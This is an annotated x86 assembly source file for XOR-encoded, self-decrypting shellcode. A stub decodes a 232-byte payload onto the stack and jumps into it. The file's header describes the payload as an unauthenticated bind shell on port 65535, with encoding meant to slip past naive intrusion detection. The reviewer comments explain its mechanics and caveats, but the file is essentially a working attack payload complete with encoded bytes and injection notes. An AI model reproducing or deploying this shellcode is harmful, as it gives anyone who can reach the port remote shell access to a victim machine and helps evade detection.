/*
 * Self-decrypting 32-bit x86 shellcode, AT&T/GAS syntax.
 * Original author: beck@math.co.ro
 *
 * Layout:
 *   - decoder stub (main: .. memshell:) that XOR-decodes the payload onto the
 *     stack one dword at a time, back to front, and then jumps into it;
 *   - string: zeroes the registers the decoder relies on and does `call main`;
 *     the call pushes the address of the data that follows it, which main:
 *     pops into %esi (classic jmp/call/pop address loading);
 *   - 232 bytes of payload (58 dwords; 12 .ascii runs = 11 x 20 + 12 bytes),
 *     every byte XORed with 0x5f.
 *
 * Per the original header the decoded payload is a socket/bind/listen/accept/
 * dup2/execve bind shell on 0.0.0.0:65535. The payload bytes are opaque here;
 * only the ends are sanity-checked against that description: the first two
 * data bytes decode to 31 c0 (xor %eax,%eax) and the last four to
 * 0b cd 80 90 (tail of mov $0xb,%al; int $0x80; nop), consistent with execve.
 *
 * Security / deployment caveats (reviewer notes):
 *   - The payload runs from the stack (`jmp *%esp`), so an executable stack is
 *     required (NX/DEP off, or the binary linked with an executable stack);
 *     otherwise the indirect jump faults.
 *   - A single repeated key byte (0x5f) is recovered by XORing the first data
 *     byte with the expected 0x31; it only defeats a naive byte-signature match.
 *     "no need for more against IDS" in the original header is the author's
 *     claim, not a property of the encoding.
 *   - The bind shell (per the header) listens on all interfaces with no
 *     authentication: any host that can reach the port gets the shell.
 *   - NOTE(review): `main` is exported at the `pop %esi` that follows
 *     `jmp string`. If this file is linked as an ordinary C program and entered
 *     via main, the register zeroing and the `call main` at string: never run,
 *     and the pop reads the caller's return address instead of the data
 *     pointer. The shellcode proper is the byte run starting at `jmp string`;
 *     extract/inject those bytes rather than executing the linked binary -
 *     confirm the intended build/use.
 */
.globl main
        jmp string                      /* skip the decoder; string: comes back via `call main` */

/* Register contract on entry to main (established at string:):
 *   %eax = 0 (loop counter), %ebx = 0, %ecx = 0, %edx = 0,
 *   top of stack = address of the encoded data (pushed by `call main`). */
main:
        pop %esi                        /* %esi = start of encoded data */
        movb $228,%cl                   /* %ecx = 228 = 232 - 4: offset of the LAST dword (needs %ecx == 0 beforehand) */
        add %ecx,%esi                   /* %esi -> last dword; decoding back-to-front makes the pushes land in order */
        movl $0x5f5f5f5f,%ecx           /* key byte 0x5f replicated across the dword */
        movb $58,%dl                    /* %edx = 58 = 232 / 4 dwords to decode (needs %edx == 0 beforehand) */
/* The loop body starts exactly 12 bytes into main:
 *   pop %esi (1) + movb imm8 (2) + add (2) + movl imm32 (5) + movb imm8 (2) = 12,
 * which is what `jmp main+12` below relies on. Changing any of the five setup
 * instructions above silently retargets the loop. */
        movl (%esi),%ebx                /* fetch the next (earlier) encoded dword */
        sub $4,%esi                     /* step backwards through the data */
        xor %ecx,%ebx                   /* decode: each byte ^= 0x5f */
        push %ebx                       /* store below %esp; after the loop %esp points at payload byte 0 */
        inc %eax                        /* dwords decoded so far */
        cmp %eax,%edx                   /* all 58 done? */
        je memshell
        jmp main+12                     /* otherwise next dword (see offset note above) */

memshell:
        jmp *%esp                       /* execute the decoded payload in place on the stack (needs an executable stack) */

string:
        xor %eax,%eax                   /* zero the counter and every register the decoder assumes clear */
        xor %ebx,%ebx
        xor %ecx,%ecx
        xor %edx,%edx
        call main                       /* pushes the address of the .ascii data below as the "return address" */
        /* 232 bytes of payload, every byte XORed with 0x5f. Bytes are opaque here; do not edit by hand. */
        .ascii "\x6e\x9f\x6e\x84\x6e\x8d\xdc\xb3\x50\xd6\xbe\xef\x39\xdf\x9c\x5e\x99\x5e\x5d\x99"
        .ascii "\x1e\x5b\x5e\xd6\x0e\x57\x92\xdf\xdc\x9b\x50\xd6\x98\x0d\xd6\x66\x6e\x9f\xef\x39"
        .ascii "\x6e\x84\xec\x5d\xdc\xb3\x7f\xd6\xbd\x99\x5d\x5d\x39\x98\x1d\x5d\xa0\xa0\x6e\xa9"
        .ascii "\xd6\x2d\x5b\xd2\x75\xd6\x36\x5b\x99\x1e\x57\x4f\x92\xdf\xdc\x9b\x7f\x6e\x9f\xef"
        .ascii "\x39\xdc\xb3\x57\xd6\xbe\x6e\x84\xec\x5b\xd6\x66\x99\x1e\x5b\x55\x92\xdf\xdc\x9b"
        .ascii "\x57\xdc\xb3\x6f\xd6\xbe\x6e\x9f\xef\x39\x6e\x84\xec\x5a\xd6\x66\xd6\x36\x5b\xdc"
        .ascii "\x9b\x6f\xdc\xb3\x57\xd6\xbd\x99\x5d\x4f\xd6\xa1\xd2\x65\xd6\x26\x57\x92\xdf\x37"
        .ascii "\x33\x33\x61\xa0\x37\x63\x2c\x37\x3a\xd6\x9c\x6e\x9f\xd7\x1b\x7b\x58\x6e\x8d\xef"
        .ascii "\x5b\xd6\xbe\xed\x57\x92\xdf\x6e\x9f\xef\x60\x6e\x96\xee\x5d\x92\xdf\x6e\x9f\xef"
        .ascii "\x60\x6e\x96\xee\x5e\x92\xdf\x6e\x9f\xef\x60\x6e\x96\x92\xdf\x6e\x9f\x6e\x84\xef"
        .ascii "\x48\x92\xdf\x37\x70\x2c\x37\xa0\x37\x70\x3d\x36\x31\x6e\x9f\xd7\x1b\x7b\x58\xd6"
        .ascii "\xbc\x0f\x0c\xd6\xbe\xd6\x9d\xef\x54\x92\xdf\xcf"